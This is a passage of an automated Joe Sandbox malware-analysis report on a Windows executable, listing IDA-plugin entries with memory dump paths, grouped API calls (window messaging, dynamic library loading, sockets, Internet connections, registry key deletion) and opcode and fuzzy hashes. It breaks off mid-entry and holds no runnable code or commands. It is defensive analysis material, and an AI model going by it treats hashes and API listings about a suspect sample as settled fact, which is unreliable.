                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem
                                                                            • String ID: P
                                                                            • API String ID: 135850232-3110715001
                                                                            • Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                            • Instruction ID: a8f4affaa28d7b6c5b2749f867365ec6937f5c8550ac64ebe002cffcff52aba7
                                                                            • Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                            • Instruction Fuzzy Hash: 8241E322A14A8191EB74EB35C445BA9AB60FB84BE0F968231DA6D03BC1DF3CD453C721
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            • API String ID: 847901565-1698111956
                                                                            • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                            • Instruction ID: d055dd3b5a1304f641d4fe7ee77bcc1a09540baa141bff1828f54bb35fe9e9a1
                                                                            • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                            • Instruction Fuzzy Hash: DA416132A097C186E770AF28E444B99BBA1F7847A4F544335DAA807A98DF3CD856CF50
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 1752125012-2298589950
                                                                            • Opcode ID: 3ad8a05af1a04f4639f3558a706eda2379b4f54061b6a2bc35ec0bb5bf7c66ed
                                                                            • Instruction ID: caf6b1266d932062c98667e36cdf14d1fc0aba129c62b7c5a06da5f160d0fe4d
                                                                            • Opcode Fuzzy Hash: 3ad8a05af1a04f4639f3558a706eda2379b4f54061b6a2bc35ec0bb5bf7c66ed
                                                                            • Instruction Fuzzy Hash: 4931A232A18B8596EB60EF25E4807AAB760FBC4BD1F908136DA8D47B54CF3CD456CB10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                            • String ID: Listbox
                                                                            • API String ID: 3747482310-2633736733
                                                                            • Opcode ID: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                            • Instruction ID: ae2d849030f310cdee95cc9c06acb55ed0c788b5afac29f210d0b31f73e3d623
                                                                            • Opcode Fuzzy Hash: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                            • Instruction Fuzzy Hash: AE313D366187C186E770DF25B444A5AB7A5F7887E0F504235EAA903B99CB3DD492CF10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                            • String ID: msctls_trackbar32
                                                                            • API String ID: 1025951953-1010561917
                                                                            • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                            • Instruction ID: 37175810469db58f4b377866d3ed58faad0e93a025a0d015828301e0ced66898
                                                                            • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                            • Instruction Fuzzy Hash: BD31187261868187E770DF25E448B5ABBA1FB88B90F504235EBA803B54CF3CD856CB14
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                            • String ID: %s%d
                                                                            • API String ID: 2330185562-1110647743
                                                                            • Opcode ID: 857964eeb1744f33fa59f7157a8d227542009ecfa466120d8aa32e1a6fda710b
                                                                            • Instruction ID: 9d933bcb7dd11f4011cdd4e40c90c8c6275f27f42b3564bccf17ae034eb3683a
                                                                            • Opcode Fuzzy Hash: 857964eeb1744f33fa59f7157a8d227542009ecfa466120d8aa32e1a6fda710b
                                                                            • Instruction Fuzzy Hash: 36218121B08B8291EA28FB32E8446FAA761EF85BD0F944031DE9D07755DF2CE127C720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                            • String ID: csm
                                                                            • API String ID: 2280078643-1018135373
                                                                            • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                            • Instruction ID: dc09db8ec29c2af25564069df3990dda2c47db4c6191aa6ae467bd01d7d1b1d2
                                                                            • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                            • Instruction Fuzzy Hash: AC212F76608641C3E630EF21E44056EBB61FB89BA5F804266DE9D03795CF3DE897CB14
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF797892DD1), ref: 00007FF7978CAF37
                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF797892DD1), ref: 00007FF7978CAF4F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                            • API String ID: 2574300362-1816364905
                                                                            • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                            • Instruction ID: 2775bc3f127b35619ae2a6c0553559bb10c9a76e7856dff9d91fe39c9e3c390d
                                                                            • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                            • Instruction Fuzzy Hash: 3AF01C61A15B0691EF28AB70E844764A7E4FF08B89FC40435C91C02360EF7CD56AC320
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 2574300362-4033151799
                                                                            • Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                            • Instruction ID: 2140b10f2f0e74c92c5db0efa03923abbdf8b4bbd348266ee722381d58e5763f
                                                                            • Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                            • Instruction Fuzzy Hash: 5EE0ED65E15B0681EF28BB70E85476863A0FF08B95F840435D91D45354EF7CD5A6C350
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                            • API String ID: 2574300362-192647395
                                                                            • Opcode ID: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                            • Instruction ID: 0d112c572ae57959e3ed3ec63974e09549fc2da54571f1a8ede102ac5763e3b1
                                                                            • Opcode Fuzzy Hash: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                            • Instruction Fuzzy Hash: 4DE0ED65909B0281EF29AB70E41476467E0FF18B88FC40435C92D45350EFBCD5B6C350
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                            • Instruction ID: a83402bad41ea4dab4c33bfbf59ecde92d6287c26a8b4f426e04aa8edbbb3200
                                                                            • Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                            • Instruction Fuzzy Hash: 45D13876B04B5586EB249F36C8506AC7BB4FB88F88B514422DF4D47B98EF39E855C320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 9575b81051ec9d4a2dbca7109e0a5d23717368d5fc25d1fd70a1261be0fad00e
                                                                            • Instruction ID: 30610fcb67b3a405e060202d332c9cce95a5b638881965cc9a83fa8e9b13293e
                                                                            • Opcode Fuzzy Hash: 9575b81051ec9d4a2dbca7109e0a5d23717368d5fc25d1fd70a1261be0fad00e
                                                                            • Instruction Fuzzy Hash: 87D15A76B04B419AEB20EF75D4805AC7B75FB94788B804036DE0D57B59DF38E52AC390
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientMessageMoveRectScreenSend
                                                                            • String ID:
                                                                            • API String ID: 1249313431-0
                                                                            • Opcode ID: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                            • Instruction ID: cdd6941f367c1583f124449ed13728d87d1919defa9f09e9f065f7d0e16dae2d
                                                                            • Opcode Fuzzy Hash: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                            • Instruction Fuzzy Hash: CB519332A0564285E770AF35D480ABD7BA6FB44BD8F915136DE2D53784DF39E852C320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 2267087916-0
                                                                            • Opcode ID: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                            • Instruction ID: eaf9ba609c8bd3c326e674ada18aabbe4a6e0621bb2f864eba613c19c8da141c
                                                                            • Opcode Fuzzy Hash: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                            • Instruction Fuzzy Hash: 8F51D022B05B1185EF64AF36D8409ACABB9BB44BE4B944135DE0D53798EF3CD563C320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$socket
                                                                            • String ID:
                                                                            • API String ID: 1881357543-0
                                                                            • Opcode ID: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                            • Instruction ID: 244fef52c3ab393ef78903b75490a52a333be1ebf3f4959f1abab80a5d1889fb
                                                                            • Opcode Fuzzy Hash: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                            • Instruction Fuzzy Hash: 24417061B1878286DB24BF36A441A7DAF90BB85FE4F844534DE1E5BB96CF3CD0228750
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 3321077145-0
                                                                            • Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                            • Instruction ID: 766fd237758725a4fe5d9aeab8b9d2f0ef4e0183f95fc7ca3ddcb94860656552
                                                                            • Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                            • Instruction Fuzzy Hash: E641BB66A04B4681EB24FF26D49146DAB60FB88FD4B889432DF4E47766DF3CE4528360
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1352109105-0
                                                                            • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                            • Instruction ID: 8b2ccc7c5741ae825ec5bddb5b40308644895a9352ea87f3c561dbdd89d55f28
                                                                            • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                            • Instruction Fuzzy Hash: 2C414032A09B4686EE61AF29D884A79BBA0FB44BD4F954135CE6D43360DF3CE8539310
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                            • String ID:
                                                                            • API String ID: 4141327611-0
                                                                            • Opcode ID: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                            • Instruction ID: ba871cbe30f8b5f4336cc9190f857832ae0bb7c0f042272a0d0d70f3ba0964c1
                                                                            • Opcode Fuzzy Hash: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                            • Instruction Fuzzy Hash: 9841B432A0CB8256FB71AB359048B79EA91EF40BD0FA4C130DA4947AD5DF2DF8538721
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$InvalidateMessageRectSend
                                                                            • String ID:
                                                                            • API String ID: 3340791633-0
                                                                            • Opcode ID: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                            • Instruction ID: fbf01b903c94b5ec7d7ee4ac32f9189b1d2572217a38a74273fca015f55fa78f
                                                                            • Opcode Fuzzy Hash: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                            • Instruction Fuzzy Hash: 9A41B631E0854689F774BB75E488BB8EB50EB84BD4F945136D60D436D5CE3CE4A38720
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 1463438336-0
                                                                            • Opcode ID: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                            • Instruction ID: 97c1c61a0430225de284c1602ac1fed7932e0d947edb472168855a96ba70e628
